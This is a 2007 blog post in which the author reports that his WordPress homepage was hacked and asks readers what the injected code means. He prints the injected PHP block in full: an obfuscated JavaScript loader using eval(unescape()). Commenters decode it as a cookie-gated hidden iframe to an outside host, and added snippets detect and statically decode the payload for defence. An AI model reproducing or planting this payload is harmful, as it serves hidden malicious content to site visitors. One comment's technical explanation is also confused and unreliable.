Trying to hack the blog?
December 9, 2007 by Emanuele Feronato
Filed Under This blog in the net •
During the last 4 hours the homepage of this blog was not accessible.
Someone hacked the index.php page and replaced this code
PHP:
<?php
require('./wp-blog-header.php');
?>
with this one
PHP:
<?php
/* Short and sweet */
require('./wp-blog-header.php');
?>
<?php
function phpfake($buffer)
{
$Exp='<script language="javascript">$="%6fp%3d%22%2524%253d%2522dw(d%2563s%2528c%2575,1%2534))%253b%2522;%22;cd%3d%221%2529;%2573t%253dst+S%2574rin%2567.f%2572o%256dCha%2572C%256fde(%2528tmp%25%22;cz%3d%22%2566unc%2574i%256fn %2563z%2528c%257a){%2572etu%2572n %2563a+c%2562+c%2563+%2563d+%2563e%252bcz;%257d;%22;cc%3d%22ds.l%2565ng%2574%2568;%2569++%2529{t%256dp%253dds%252esli%2563%2565(i,%2569+%22;db%3d%22d7%3c7e7%3c7f7%3c7g7%3c7h7%3c7i7%3c7j79+fqb0~)-~ug0Qbbqi8!%3c%2522%3c#%3c$%3c%25%3c&%3c%27%3c(%3c)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)%3ewudVe||Iuqb89+yv8t)%3ewudTqi89.#9d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi89;%25229+u|cu%22;da%3d%22fqb0})-~ug0Qbbqi87e~%257F7%3c7tfu7%3c7dxb7%3c7vyb7%3c7fyv7%3c7huc7%3c7fuc7%3c7wxd7%3c7u~y7%3c7ud~7%3c7|uf7%3c7dgu79+fqb0|)-~ug0Qbbqi87q7%3c7r7%3c7s7%3c7t7%3c7u7%3c7v7%3c7w7%3c7x7%3c7y7%3c7z7%3c7{7%3c7|7%3c7}7%3c7~7%3c7%257F7%3c7`7%3c7a7%3c7b7%3c7c7%3c7%22;cb%3d%221pe%2528%2564s)%253bst%253d%2574m%2570%253d%2527%2527;for(i%253d0%253b%2569%253c%22;ca%3d%22%2566u%256ecti%256fn %2564cs%2528d%2573%252ce%2573%2529%257bds%253dunes%2563%256%22;dc%3d%220d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi899+yv8d)K7t7M,%25209d)K7t7M-!+d)K7}7M-t)%3ewud]%257F~dx89;!+ve~sdy%257F~0S]^8t%3c}%3ci9kfqb0b-888i;8#:t99;8}Nt9:#9;t9+budeb~0b+mfqb0t-7fuc|%257Fh%3es%257F}7+fqb0iSx!%3ciSx%2522%3c%22;st%3d%22%2573%2574%253d%2522$%253ds%2574%253b%2564%2563s%2528%2564a%252bd%2562+%2564%2563%252b%2564%2564%252bd%2565%252c%25310%2529%253bd%2577%2528%2573t%2529%253bs%2574%253d$%253b%2522;%22;dz%3d%22%2566%2575%256ecti%256fn %2564w%2528%2574){c%2561%253d%2527%252564ocu%25256%2564%2565%256et%25252ew%252572i%2574%252565%252528%252522%2527;ce%253d%2527%252522%252529%2527;cb%253d%2527%25253csc%252572i%252570t 
%2525%2536%2563a%25256e%25256%2537u%252561%2567%2565%25253d%25255c%252522ja%2576a%2573c%25257%2532%2569pt%25255c%252522%2525%2533%2565%2527;cc%253d%2527%25253c%25255c%25252fscrip%25257%2534%25253e%2527;eva%256c(un%2565s%2563a%2570e(t%2529)%257d%253b%22;de%3d%22-|)K88d)K7}7M;}^}950%2522%259M+yv888d)K7t7M:%25229.-%252096688d)K7t7M:%25229,-)99tSx-~)K8d)K7t7M50!%25209M+u|cu0tSx-|)K88d)K7t7M:&950%2522%279M+4-4%3ebu`|qsu8t%3ciSx%2522;}Sx;iSx!;tSx;})Kd)K7}7M%3d!M;7%3es%257F}79+%22;ce%3d%222echa%2572Cod%2565At%25280)^%2528%25270x00%2527+e%2573%2529)%2529;}%257d%22;cu%3d%22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;bqgx{l:w{y;xp;sfv;64c}p`|)%25$$4|q}s|`),$*(;}rfuyq*(;p}b*%22;dd%3d%22}Sx%3ctSx%3c}^}+yv8d)K7i7M,%2522%2520%2520%279kd)K7i7M0-0%2522%2520%2520%27+m}^}-S]^8d)K7t7M%3cd)K7}7M%3cd)K7i7M9+iSx!-|)K888d)K7i7M6%2520hQQ9;}^}950&5##950%2522&M+iSx%2522-|)K8888d)K7i7M6%2520h##!!9..#9;}^}950!%25209M+}Sx%22;%69f %28d%6f%63u%6d%65%6et%2e%63oo%6bie%2ein%64ex%4ff(%27r%665f6%64s%27)%3d%3d-1%29%7bsc(%27%72f5f%36d%73%27,2%2c7);%65v%61l(%75n%65s%63ape%28d%7a+c%7a%2bop+%73t)+%27dw%28dz%2b%63%7a(%24+s%74))%3b%27)}el%73e{%24%3d%27%27};func%74io%6e %73c(c%6e%6d,v,%65d)%7b%76ar%20%65xd%3dnew %44ate%28);e%78%64.se%74Da%74%65(%65x%64.%67etD%61%74e%28)+%65d);%64%6fcu%6den%74.co%6fki%65%3dcnm+ %27%3d%27 +%65%73ca%70e%28v%29+%27;e%78pir%65%73%3d%27+exd.t%6fG%4dT%53t%72in%67(%29;};";eval(unescape($));document.write($);</script><script language="javascript">$="%6fp%3d%22%2524%253d%2522dw(d%2563s%2528c%2575,1%2534))%253b%2522;%22;cd%3d%221%2529;%2573t%253dst+S%2574rin%2567.f%2572o%256dCha%2572C%256fde(%2528tmp%25%22;cz%3d%22%2566unc%2574i%256fn %2563z%2528c%257a){%2572etu%2572n 
%2563a+c%2562+c%2563+%2563d+%2563e%252bcz;%257d;%22;cc%3d%22ds.l%2565ng%2574%2568;%2569++%2529{t%256dp%253dds%252esli%2563%2565(i,%2569+%22;db%3d%22d7%3c7e7%3c7f7%3c7g7%3c7h7%3c7i7%3c7j79+fqb0~)-~ug0Qbbqi8!%3c%2522%3c#%3c$%3c%25%3c&%3c%27%3c(%3c)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)%3ewudVe||Iuqb89+yv8t)%3ewudTqi89.#9d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi89;%25229+u|cu%22;da%3d%22fqb0})-~ug0Qbbqi87e~%257F7%3c7tfu7%3c7dxb7%3c7vyb7%3c7fyv7%3c7huc7%3c7fuc7%3c7wxd7%3c7u~y7%3c7ud~7%3c7|uf7%3c7dgu79+fqb0|)-~ug0Qbbqi87q7%3c7r7%3c7s7%3c7t7%3c7u7%3c7v7%3c7w7%3c7x7%3c7y7%3c7z7%3c7{7%3c7|7%3c7}7%3c7~7%3c7%257F7%3c7`7%3c7a7%3c7b7%3c7c7%3c7%22;cb%3d%221pe%2528%2564s)%253bst%253d%2574m%2570%253d%2527%2527;for(i%253d0%253b%2569%253c%22;ca%3d%22%2566u%256ecti%256fn %2564cs%2528d%2573%252ce%2573%2529%257bds%253dunes%2563%256%22;dc%3d%220d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi899+yv8d)K7t7M,%25209d)K7t7M-!+d)K7}7M-t)%3ewud]%257F~dx89;!+ve~sdy%257F~0S]^8t%3c}%3ci9kfqb0b-888i;8#:t99;8}Nt9:#9;t9+budeb~0b+mfqb0t-7fuc|%257Fh%3es%257F}7+fqb0iSx!%3ciSx%2522%3c%22;st%3d%22%2573%2574%253d%2522$%253ds%2574%253b%2564%2563s%2528%2564a%252bd%2562+%2564%2563%252b%2564%2564%252bd%2565%252c%25310%2529%253bd%2577%2528%2573t%2529%253bs%2574%253d$%253b%2522;%22;dz%3d%22%2566%2575%256ecti%256fn %2564w%2528%2574){c%2561%253d%2527%252564ocu%25256%2564%2565%256et%25252ew%252572i%2574%252565%252528%252522%2527;ce%253d%2527%252522%252529%2527;cb%253d%2527%25253csc%252572i%252570t 
%2525%2536%2563a%25256e%25256%2537u%252561%2567%2565%25253d%25255c%252522ja%2576a%2573c%25257%2532%2569pt%25255c%252522%2525%2533%2565%2527;cc%253d%2527%25253c%25255c%25252fscrip%25257%2534%25253e%2527;eva%256c(un%2565s%2563a%2570e(t%2529)%257d%253b%22;de%3d%22-|)K88d)K7}7M;}^}950%2522%259M+yv888d)K7t7M:%25229.-%252096688d)K7t7M:%25229,-)99tSx-~)K8d)K7t7M50!%25209M+u|cu0tSx-|)K88d)K7t7M:&950%2522%279M+4-4%3ebu`|qsu8t%3ciSx%2522;}Sx;iSx!;tSx;})Kd)K7}7M%3d!M;7%3es%257F}79+%22;ce%3d%222echa%2572Cod%2565At%25280)^%2528%25270x00%2527+e%2573%2529)%2529;}%257d%22;cu%3d%22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;bqgx{l:w{y;xp;sfv;64c}p`|)%25$$4|q}s|`),$*(;}rfuyq*(;p}b*%22;dd%3d%22}Sx%3ctSx%3c}^}+yv8d)K7i7M,%2522%2520%2520%279kd)K7i7M0-0%2522%2520%2520%27+m}^}-S]^8d)K7t7M%3cd)K7}7M%3cd)K7i7M9+iSx!-|)K888d)K7i7M6%2520hQQ9;}^}950&5##950%2522&M+iSx%2522-|)K8888d)K7i7M6%2520h##!!9..#9;}^}950!%25209M+}Sx%22;%69f %28d%6f%63u%6d%65%6et%2e%63oo%6bie%2ein%64ex%4ff(%27r%665f6%64s%27)%3d%3d-1%29%7bsc(%27%72f5f%36d%73%27,2%2c7);%65v%61l(%75n%65s%63ape%28d%7a+c%7a%2bop+%73t)+%27dw%28dz%2b%63%7a(%24+s%74))%3b%27)}el%73e{%24%3d%27%27};func%74io%6e %73c(c%6e%6d,v,%65d)%7b%76ar%20%65xd%3dnew %44ate%28);e%78%64.se%74Da%74%65(%65x%64.%67etD%61%74e%28)+%65d);%64%6fcu%6den%74.co%6fki%65%3dcnm+ %27%3d%27 +%65%73ca%70e%28v%29+%27;e%78pir%65%73%3d%27+exd.t%6fG%4dT%53t%72in%67(%29;};";eval(unescape($));document.write($);</script>';
}
?>
Any clue about the meaning of this expression? I googled for it but I only got results in German.
This reminded me to make a complete backup of the blog and the database.
I try to back up the blog every week, but sometimes it takes a month before I realize I must back up.
If you have a blog, how often do you back it up?
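A check for this kind of `index.php` tampering, as an added example (not code from the original post or from WordPress). It compares a file against a known-good copy and looks for the traits of the injected block shown above; the sample strings are constructed, with the payload replaced by a harmless placeholder, and the function names are hypothetical.

```javascript
// Constructed samples modelled on the post: the known-good bootstrap and a tampered
// copy whose payload is replaced by a harmless, double-escaped placeholder string.
const CLEAN = "<?php\nrequire('./wp-blog-header.php');\n?>\n";
const TAMPERED =
  "<?php\n/* Short and sweet */\nrequire('./wp-blog-header.php');\n?>\n" +
  "<?php\nfunction phpfake($buffer)\n{\n$Exp='<script language=\"javascript\">" +
  "$=\"%70%6c%61%63%65%68%6f%6c%64%65%72%2520%2564%2561%2574%2561\";" +
  "eval(unescape($));document.write($);</script>';\n}\n?>\n";

// Patterns taken from what the injected file on this page contains.
const RULES = [
  { id: "eval-unescape", re: /eval\s*\(\s*unescape\s*\(/i },
  { id: "document-write", re: /document\.write\s*\(/i },
  { id: "script-in-php-string", re: /=\s*'<script\b/i },
];

// Lines present in the current file but absent from the known-good copy.
function addedLines(baseline, current) {
  const known = new Set(baseline.split("\n").map(l => l.trim()));
  return current.split("\n").map(l => l.trim()).filter(l => l && !known.has(l));
}

function scanPhpSource(src, baseline) {
  const findings = RULES.filter(r => r.re.test(src)).map(r => r.id);
  // The bootstrap holds one PHP block; a second one appended after ?> is suspect.
  if ((src.match(/<\?php/g) || []).length > 1) findings.push("extra-php-block");
  // Long runs of %XX escapes do not occur in hand-written bootstrap code.
  if ((src.match(/%[0-9a-fA-F]{2}/g) || []).length >= 10) findings.push("percent-encoded-blob");
  const added = baseline === undefined ? [] : addedLines(baseline, src);
  if (added.length > 0) findings.push("differs-from-baseline");
  return { suspicious: findings.length > 0, findings, added };
}
```

Run from a scheduled job against the live file and a copy kept off the web server, this reports the change within minutes instead of after visitors notice.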
10 Responses to “Trying to hack the blog?”

I was worried when I saw that the homepage of the blog was down. I’m glad to see it back up.
Better make sure that the hacker can't strike again! I hate hackers because they just keep screwing my life!
PS. Sorry my bad English
It seems to be a javascript function intent on hurting your webpage's HTML tags. The most common cause for this is unsafe or un-updated hardware or virus protection on the server on which you host this blog. To fix this problem, regularly back up files and make sure that your hosting is hacker safe. This particular instance affected the entire front page by altering your tags and replacing them with its own code, which is what the Java was. This was a minor thing that could happen, as a skilled hacker could shut down your page for weeks and put their homepage up instead of yours.
~Snuggles
There should be a script that u can use to prevent it against all hackers.
i backup my site everyday with the automatic aruba.it function (it costs only 2 euro/year to have the daily backup!!!!)
i recommend you to do the same ;)
ciao !
Massy
to get on your blog I just went on one of your tutorials via my web cookies and then just looked at the new post bit to see if you did anything new.
It seems to be an obfuscated javascript function which will be inserted at the bottom of the page.
The function seems to check if a cookie exists:
>> if (document.cookie.indexOf('rf5f6ds')==-1)
If it does not exist, it will create that cookie, and then do something else (which I have not de-fuscated yet)…
Otherwise, it will do exactly nothing (or at least, that's what it looks like)…
-Mike
So… after tracing thru the code, this is what will be placed at the bottom of your page (ie; just before the closing body tag ”
Not sure if that is of any use to you… but at least now you know what it’s trying to do (sort of).
Also, this is the code that would generate the cookie:
>>sc('rf5f6ds',2,7);
>>function sc(cnm,v,ed)
>>{
>> var exd=new Date();
>> exd.setDate(exd.getDate()+ed);
>> document.cookie=cnm+ '=' +escape(v)+';expires='+exd.toGMTString();
>>};
So, it sets the cookie with a value of ‘2′ and an expiration date of “one week from now”…
I suppose, this is so it would only send visitors to the (hidden) page once a week…
-Mike
Hmmm, looks like the code I entered got stripped out… I’ll try again:
<div style=”visibility:hidden”><iframe src=”http://guuatwe.com/ld/grb/” width=100 height=80></iframe></div>
-Mike
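The tracing described in the comments above can be done without running the script. This added example (not part of the original thread) peels nested `%XX` escaping statically and pulls out the indicators mentioned there: the cookie gate and the hidden iframe. The sample is constructed, uses a reserved placeholder host, and covers only the percent-escaping layers, not the rest of the real payload's obfuscation; all function names are hypothetical.

```javascript
// Tolerant stand-in for unescape(): decodes %XX only, leaves malformed escapes
// untouched, and never evaluates anything.
function percentDecode(s) {
  return s.replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Peel nested escaping until the text stops changing (bounded, so hostile input cannot loop).
function peelLayers(s, maxLayers = 8) {
  let layers = 0;
  while (layers < maxLayers) {
    const next = percentDecode(s);
    if (next === s) break;
    s = next;
    layers++;
  }
  return { layers, text: s };
}

function analyze(scriptText) {
  // The wrapper on this page stores the blob in a variable named $ and evals it.
  const m = /\$\s*=\s*"([^"]*)"/.exec(scriptText);
  const { layers, text } = peelLayers(m ? m[1] : scriptText);
  const gate = /document\.cookie\.indexOf\(\s*['"]([^'"]+)['"]/.exec(text);
  const frames = Array.from(
    text.matchAll(/<iframe\b[^>]*?\bsrc\s*=\s*["']?([^"'\s>]+)/gi), x => x[1]);
  return {
    layers,
    cookieGate: gate ? gate[1] : null,
    iframeSrc: frames,
    hidden: /visibility\s*:\s*hidden|display\s*:\s*none/i.test(text),
    evalOfDecoded: /eval\s*\(\s*unescape\s*\(/.test(scriptText),
  };
}

// Constructed sample: a cookie-gated hidden iframe, escaped twice, in the same wrapper.
const enc = s => Array.from(s, c => "%" + c.charCodeAt(0).toString(16).padStart(2, "0")).join("");
const INNER = "if(document.cookie.indexOf('rf5f6ds')==-1){sc('rf5f6ds',2,7);" +
  "document.write('<div style=\"visibility:hidden\">" +
  "<iframe src=\"http://placeholder.example/x/\"></iframe></div>');}";
const SAMPLE = '$="' + enc(enc(INNER)) + '";eval(unescape($));document.write($);';
```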
no wonder the site was down…